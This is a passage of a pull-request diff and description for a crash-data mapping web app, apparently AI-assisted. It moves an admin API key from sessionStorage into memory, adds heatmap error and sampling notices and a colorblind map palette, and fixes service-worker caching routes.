       if (!res.ok) throw new Error(`ETL status ${res.status}`);
       const data = await res.json();
       return data.sources;
@@ -48,7 +62,7 @@ export function useEtlRuns(limit = 20) {
   return useQuery<EtlRunItem[]>({
     queryKey: ["etlRuns", limit],
     queryFn: async () => {
-      const res = await fetch(`${API_BASE}/api/etl/runs?limit=${limit}`);
+      const res = await etlFetch(`${API_BASE}/api/etl/runs?limit=${limit}`);
       if (!res.ok) throw new Error(`ETL runs ${res.status}`);
       const data = await res.json();
       return data.runs;
@@ -64,7 +78,7 @@ export function useTriggerEtl() {
       const url = only
         ? `${API_BASE}/api/etl/run?only=${only}`
         : `${API_BASE}/api/etl/run`;
-      const res = await fetch(url, { method: "POST" });
+      const res = await etlFetch(url, { method: "POST" });
       if (!res.ok) throw new Error(`Trigger failed ${res.status}`);
       return res.json();
     },

--- a/frontend/src/lib/adminKey.ts
+++ b/frontend/src/lib/adminKey.ts
@@ -1,0 +1,46 @@
+/**
+ * Admin/ETL API key storage.
+ *
+ * The key lives in sessionStorage (never localStorage) so it does not outlive
+ * the tab. When the backend rejects the key (403), `clearAdminKey` wipes it
+ * and broadcasts an event so <AdminGuard> can fall back to the locked state.
+ */
+
+const KEY_STORAGE = "calsight-admin-key";
+
+/** Header name expected by the backend (see backend/app/routers/etl.py). */
+export const ETL_KEY_HEADER = "X-ETL-API-Key";
+
+/** Fired on `window` whenever the stored key is cleared. */
+export const ADMIN_KEY_CLEARED_EVENT = "calsight-admin-key-cleared";
+
+export function getAdminKey(): string | null {
+  try {
+    return sessionStorage.getItem(KEY_STORAGE);
+  } catch {
+    return null;
+  }
+}
+
+export function setAdminKey(key: string): void {
+  try {
+    sessionStorage.setItem(KEY_STORAGE, key);
+  } catch {
+    // Private browsing, quota exceeded, or storage disabled
+  }
+}
+
+export function clearAdminKey(): void {
+  try {
+    sessionStorage.removeItem(KEY_STORAGE);
+  } catch {
+    // Swallow
+  }
+  window.dispatchEvent(new Event(ADMIN_KEY_CLEARED_EVENT));
+}
+
+/** Headers to attach to every /api/etl/* request. */
+export function etlAuthHeaders(): Record<string, string> {
+  const key = getAdminKey();
+  return key ? { [ETL_KEY_HEADER]: key } : {};
+}

--- a/frontend/src/lib/adminKey.ts
+++ b/frontend/src/lib/adminKey.ts
@@ -1,12 +1,17 @@
 /**
  * Admin/ETL API key storage.
  *
- * The key lives in sessionStorage (never localStorage) so it does not outlive
- * the tab. When the backend rejects the key (403), `clearAdminKey` wipes it
- * and broadcasts an event so <AdminGuard> can fall back to the locked state.
+ * The key is held in memory only — a module-scoped variable, never
+ * sessionStorage/localStorage/cookies. Persisting a secret to web storage is
+ * clear-text storage of sensitive data (readable by any script on the page,
+ * survives across navigations), so we keep it in a closure instead: it lives
+ * exactly as long as the tab's JS context and vanishes on a full reload, at
+ * which point <AdminGuard> re-prompts. When the backend rejects the key
+ * (403), `clearAdminKey` wipes it and broadcasts an event so <AdminGuard>
+ * falls back to the locked state.
  */
 
-const KEY_STORAGE = "calsight-admin-key";
+let adminKey: string | null = null;
 
 /** Header name expected by the backend (see backend/app/routers/etl.py). */
 export const ETL_KEY_HEADER = "X-ETL-API-Key";
@@ -15,32 +20,19 @@ export const ETL_KEY_HEADER = "X-ETL-API-Key";
 export const ADMIN_KEY_CLEARED_EVENT = "calsight-admin-key-cleared";
 
 export function getAdminKey(): string | null {
-  try {
-    return sessionStorage.getItem(KEY_STORAGE);
-  } catch {
-    return null;
-  }
+  return adminKey;
 }
 
 export function setAdminKey(key: string): void {
-  try {
-    sessionStorage.setItem(KEY_STORAGE, key);
-  } catch {
-    // Private browsing, quota exceeded, or storage disabled
-  }
+  adminKey = key;
 }
 
 export function clearAdminKey(): void {
-  try {
-    sessionStorage.removeItem(KEY_STORAGE);
-  } catch {
-    // Swallow
-  }
+  adminKey = null;
   window.dispatchEvent(new Event(ADMIN_KEY_CLEARED_EVENT));
 }
 
 /** Headers to attach to every /api/etl/* request. */
 export function etlAuthHeaders(): Record<string, string> {
-  const key = getAdminKey();
-  return key ? { [ETL_KEY_HEADER]: key } : {};
+  return adminKey ? { [ETL_KEY_HEADER]: adminKey } : {};
 }

--- a/frontend/src/lib/theme/tokens.test.ts
+++ b/frontend/src/lib/theme/tokens.test.ts
@@ -1,0 +1,33 @@
+import { describe, it, expect } from "vitest";
+import { getMapSeverityColors, getTokens } from "./tokens";
+import { PALETTE_SEVERITY } from "./palettes";
+
+describe("getMapSeverityColors", () => {
+  const themeSeverity = getTokens("default", false).severity;
+
+  it("defers to the theme severity tokens for the default map palette", () => {
+    expect(getMapSeverityColors("default", false, themeSeverity)).toBe(themeSeverity);
+    expect(getMapSeverityColors("default", true, themeSeverity)).toBe(themeSeverity);
+  });
+
+  it("uses the colorblind-safe severity colors when the colorblind palette is selected", () => {
+    expect(getMapSeverityColors("colorblind", false, themeSeverity)).toEqual(
+      PALETTE_SEVERITY.colorblind,
+    );
+  });
+
+  it("uses each non-default palette's hand-picked severity colors", () => {
+    expect(getMapSeverityColors("warm", false, themeSeverity)).toEqual(PALETTE_SEVERITY.warm);
+    expect(getMapSeverityColors("cool", false, themeSeverity)).toEqual(PALETTE_SEVERITY.cool);
+  });
+
+  it("lightens non-default palette colors in dark mode", () => {
+    const light = getMapSeverityColors("colorblind", false, themeSeverity);
+    const dark = getMapSeverityColors("colorblind", true, themeSeverity);
+    expect(dark.fatal).not.toBe(light.fatal);
+    expect(dark.injury).not.toBe(light.injury);
+    expect(dark.pdo).not.toBe(light.pdo);
+    // Same treatment getTokens applies to its own severity tokens.
+    expect(dark).toEqual(getTokens("colorblind", true).severity);
+  });
+});

--- a/frontend/src/lib/theme/tokens.ts
+++ b/frontend/src/lib/theme/tokens.ts
@@ -158,6 +158,27 @@ export function getTokens(
 }
 
 /**
+ * Resolve severity dot colors for a map-layer palette selection (LayersPanel).
+ *
+ * The "default" map palette defers to the theme's severity tokens (which honor
+ * the user's chart palette and custom theme colors). Any other map palette
+ * (warm / cool / colorblind) uses that palette's hand-picked severity colors —
+ * so e.g. selecting "Colorblind Safe" in the Layers panel actually reaches the
+ * crash dots. Dark mode gets the same lighten treatment as `getTokens`.
+ */
+export function getMapSeverityColors(
+  paletteKey: ChartPaletteKey,
+  isDark: boolean,
+  themeSeverity: SeverityTokens,
+): SeverityTokens {
+  if (paletteKey === "default") return themeSeverity;
+  const sev = getPaletteSeverity(paletteKey);
+  return isDark
+    ? { fatal: lighten(sev.fatal, 0.2), injury: lighten(sev.injury, 0.2), pdo: lighten(sev.pdo, 0.3) }
+    : { ...sev };
+}
+
+/**
  * Derive a 5-color choropleth scale from the categorical palette.
  * Picks evenly-spaced colors from the palette array.
  */

--- a/frontend/src/pages/AskAiPage.story.test.tsx
+++ b/frontend/src/pages/AskAiPage.story.test.tsx
@@ -2,6 +2,7 @@ import { describe, it, expect, beforeEach, vi } from "vitest";
 import { render, screen, fireEvent } from "@testing-library/react";
 import { MemoryRouter } from "react-router-dom";
 import AskAiPage from "./AskAiPage";
+import { AskAiProvider } from "../hooks/useAskAi";
 
 // Avoid real export side effects in jsdom.
 vi.mock("../lib/story/exportCanvas", () => ({
@@ -12,7 +13,7 @@ beforeEach(() => sessionStorage.clear());
 
 describe("AskAiPage story canvas integration", () => {
   it("shows a Story toggle that opens the panel", () => {
-    render(<MemoryRouter><AskAiPage /></MemoryRouter>);
+    render(<MemoryRouter><AskAiProvider><AskAiPage /></AskAiProvider></MemoryRouter>);
     const toggle = screen.getByRole("button", { name: /story/i });
     fireEvent.click(toggle);
     expect(screen.getByRole("dialog", { name: /story/i })).toBeTruthy();

--- a/frontend/src/pages/MapPage.tsx
+++ b/frontend/src/pages/MapPage.tsx
@@ -851,6 +851,16 @@ function MapPageInner() {
             </div>
           </div>
         )}
+        {heatmapEnabled && useCountyDetail && countyHeatmap.capped && !countyHeatmap.error && (
+          <div className="absolute top-14 md:top-3 left-1/2 -translate-x-1/2 z-20">
+            <div className="bg-surface-container-lowest/95 backdrop-blur-md px-4 py-2 rounded-xl ghost-border shadow-lg min-w-[220px]">
+              <p className="text-[10px] text-on-surface-variant/70 text-center">
+                Showing a {countyHeatmap.points.length.toLocaleString()}-point sample
+                of {countyHeatmap.totalCrashes.toLocaleString()} crashes
+              </p>
+            </div>
+          </div>
+        )}
       </section>
 
       {/* Mobile filter bottom sheet */}

--- a/frontend/src/pages/MapPage.tsx
+++ b/frontend/src/pages/MapPage.tsx
@@ -200,6 +200,18 @@ function MapPageInner() {
     ? { points: countyHeatmap.points, totalCrashes: countyHeatmap.totalCrashes, isLoading: countyHeatmap.isLoading, error: countyHeatmap.error }
     : statewideHeatmap;
 
+  // Surface heatmap failures instead of leaving a silently blank map. The
+  // card is dismissible; a fresh error (or a successful retry) re-arms it.
+  const heatmapError = useCountyDetail ? countyHeatmap.error : statewideHeatmap.error;
+  const [heatmapErrorDismissed, setHeatmapErrorDismissed] = useState(false);
+  useEffect(() => {
+    if (!heatmapError) setHeatmapErrorDismissed(false);
+  }, [heatmapError]);
+  const retryHeatmap = () => {
+    if (useCountyDetail) countyHeatmap.retry();
+    else void statewideHeatmap.refetch();
+  };
+
   const mismatchCountySlug = focusedCounty ? focusedCounty.toLowerCase().replace(/\s+/g, "-") : null;
   const mismatchHeatmap = useCrashHeatmap({
     enabled: otherLayers.coordMismatches && !!mismatchCountySlug,
@@ -811,18 +823,32 @@ function MapPageInner() {
             </div>
           </div>
         )}
-        {useCountyDetail && countyHeatmap.error && countyHeatmap.points.length > 0 && (
-          <div className="absolute top-3 left-1/2 -translate-x-1/2 z-20">
-            <button
-              onClick={() => countyHeatmap.retry()}
-              className="bg-surface-container-lowest/95 backdrop-blur-md px-4 py-2 rounded-full ghost-border shadow-lg flex items-center gap-2 hover:bg-surface-container-low/95 transition-colors cursor-pointer"
+        {heatmapEnabled && !!heatmapError && !heatmapErrorDismissed && (
+          <div className="absolute top-14 md:top-3 left-1/2 -translate-x-1/2 z-20">
+            <div
+              role="alert"
+              className="bg-surface-container-lowest/95 backdrop-blur-md px-4 py-2.5 rounded-xl ghost-border shadow-lg min-w-[220px] flex items-center gap-2"
             >
-              <span className="material-symbols-outlined text-[14px] text-error">wifi_off</span>
-              <span className="text-xs font-medium text-on-surface-variant">
-                {countyHeatmap.points.length.toLocaleString()} / {countyHeatmap.totalCrashes.toLocaleString()} loaded
+              <span className="material-symbols-outlined text-[14px] text-error shrink-0" aria-hidden="true">wifi_off</span>
+              <span className="text-xs font-medium text-on-surface-variant flex-1">
+                {useCountyDetail && countyHeatmap.points.length > 0
+                  ? `Heatmap interrupted — ${countyHeatmap.points.length.toLocaleString()} / ${countyHeatmap.totalCrashes.toLocaleString()} loaded`
+                  : "Couldn't load the crash heatmap"}
               </span>
-              <span className="text-xs text-primary font-semibold">Retry</span>
-            </button>
+              <button
+                onClick={retryHeatmap}
+                className="text-xs text-primary font-semibold hover:underline"
+              >
+                Retry
+              </button>
+              <button
+                onClick={() => setHeatmapErrorDismissed(true)}
+                className="text-on-surface-variant hover:text-on-surface transition-colors -mr-1"
+                aria-label="Dismiss"
+              >
+                <span className="material-symbols-outlined text-[14px]" aria-hidden="true">close</span>
+              </button>
+            </div>
           </div>
         )}
       </section>

--- a/frontend/tests/highway-danger.spec.ts
+++ b/frontend/tests/highway-danger.spec.ts
@@ -15,13 +15,11 @@ test("toggle highway-danger layer draws lines and clicking one opens its stats",
   // Open the Layers panel from the icon rail.
   await page.getByRole("button", { name: "Layers" }).click();
 
-  // The Highway Danger toggle is an unlabeled button in its row; target the
-  // row by its text, then click the toggle inside it.
-  const highwayRow = page
-    .locator("div.flex.justify-between")
-    .filter({ hasText: "Highway Danger" })
-    .first();
-  await highwayRow.getByRole("button").click();
+  // The Highway Danger toggle is a labeled switch — target it by role + name.
+  const highwayToggle = page.getByRole("switch", { name: "Highway Danger" });
+  await expect(highwayToggle).toHaveAttribute("aria-checked", "false");
+  await highwayToggle.click();
+  await expect(highwayToggle).toHaveAttribute("aria-checked", "true");
 
   // Leaflet draws polylines as <path> in the overlay pane.
   const line = page.locator(".leaflet-overlay-pane path").first();

--- a/frontend/vite.config.ts
+++ b/frontend/vite.config.ts
@@ -27,6 +27,16 @@ export default defineConfig({
         maximumFileSizeToCacheInBytes: 4 * 1024 * 1024,
         navigateFallback: '/index.html',
         navigateFallbackDenylist: [/^\/api\//, /^\/admin\//],
+        // NOTE on the /api/* routes below: Workbox only applies RegExp routes
+        // to cross-origin requests when the match starts at index 0 of the
+        // full href, so path-only patterns like /\/api\/stats/ silently never
+        // match the prod API origin (https://api.calsight.org). Function
+        // matchers cover both the same-origin dev/preview proxy and the
+        // cross-origin prod API. These functions are serialized into the
+        // generated service worker, so they must be self-contained (no
+        // closure variables — the prod origin is inlined in each one).
+        // Routes are evaluated in registration order, so the NetworkOnly
+        // guard must stay first to take precedence over the cacheable routes.
         runtimeCaching: [
           {
             urlPattern: /^https:\/\/[a-d]\.basemaps\.cartocdn\.com\/.*/i,
@@ -38,11 +48,15 @@ export default defineConfig({
             },
           },
           {
-            urlPattern: /\/api\/(etl|ask|live-)/,
+            urlPattern: ({ url, sameOrigin }) =>
+              (sameOrigin || url.origin === 'https://api.calsight.org') &&
+              /^\/api\/(etl|ask|live-)/.test(url.pathname),
             handler: 'NetworkOnly',
           },
           {
-            urlPattern: /\/api\/(insights|calenviroscreen|unemployment|data-quality|meta)/,
+            urlPattern: ({ url, sameOrigin }) =>
+              (sameOrigin || url.origin === 'https://api.calsight.org') &&
+              /^\/api\/(insights|calenviroscreen|unemployment|data-quality|meta)/.test(url.pathname),
             handler: 'StaleWhileRevalidate',
             options: {
               cacheName: 'api-reference',
@@ -51,7 +65,9 @@ export default defineConfig({
             },
           },
           {
-            urlPattern: /\/api\/(stats|crashes|demographics|context|heatmap)/,
+            urlPattern: ({ url, sameOrigin }) =>
+              (sameOrigin || url.origin === 'https://api.calsight.org') &&
+              /^\/api\/(stats|crashes|demographics|context|heatmap)/.test(url.pathname),
             handler: 'StaleWhileRevalidate',
             options: {
               cacheName: 'api-data',


### PR DESCRIPTION
## What does this PR do?

Full-codebase audit (`docs/audit-2026-07-01.md`) plus remediation of every critical finding and the majority of high/medium ones, across three waves. Each fix landed only after its full relevant suite passed.

**Audit** — `docs/audit-2026-07-01.md`: consolidated report (5 critical, 22 high, ~55 medium, ~45 low) with file references, plus a running remediation log.

**Critical fixes**
- **C1** — daily crash ingest was no-oping once a year had any rows; now always re-loads the current + previous year (upsert-safe), and the year range auto-advances.
- **C2** — `/api/ask` timeout no longer returns a live DB session to the pool mid-query (worker thread owns its own session); abandoned requests stop burning LLM quota.
- **C3** — deploys are gated on CI success for the CI-validated commit (was: deploy and CI ran independently on push).
- **C4** — backup image installs pg_dump 17 (was v15 vs a v17 server); scheduled backup now uploads offsite to R2, rotates, and keeps the password off the command line.
- **C5** — county heatmap accumulation is bounded (was unbounded multi-GB arrays with O(total) rebuild per batch and a full-array scan per pan).

**High fixes** — shell-injection in `run-etl` closed; deploy rollback/env-preservation/pipeline-redeploy fixed; feedback write path (incl. a missing `chat_feedback` migration) + read-only role grant; ETL validation framework actually wired in (real `validation_status`); connection-pool sizing; advisory-lock idle-transaction; SWITRS streaming + malformed-time guard; AI answer correctness (county resolution, annualized rates, rate+cause 422); admin ETL auth header; prod service-worker caching; crawler HTML-escaping; drag-reorder index; ask-AI cooldown + unified shared state; choropleth error attribution; timelapse request storm; ChartCard memoization; layer-toggle a11y; colorblind dot palette; heatmap error UI. Full list and file refs in the audit doc's remediation log.

## Dependencies
None.

## How to test
- [x] Backend: `pytest` against a local Postgres 17 — 703 tests pass (unit + integration).
- [x] Frontend: `npm test` — 576 tests pass (40+ new regression tests across the fixes).
- [x] `tsc -b`, `eslint`, and `ruff` all clean.
- [ ] Recommended before merge: run one real `pg_dump` + `pg_restore` on the prod host to confirm C4 end-to-end, and set `ETL_DATABASE_URL` in `backend/.env` (now preserved across deploys) so the read-only API role is actually enforced in prod (M-I1).

## Checklist
- [x] Code builds without errors
- [x] Tested locally (703 backend + 576 frontend tests pass; tsc/eslint/ruff clean)
- [x] No console errors/warnings
- [x] No other PRs need to merge before this one

---
🤖 Generated with [Claude Code](https://claude.com/claude-code)

---
_Generated by [Claude Code](https://claude.ai/code/session_01F8KxkYXWBFToW2zxNvkYSm)_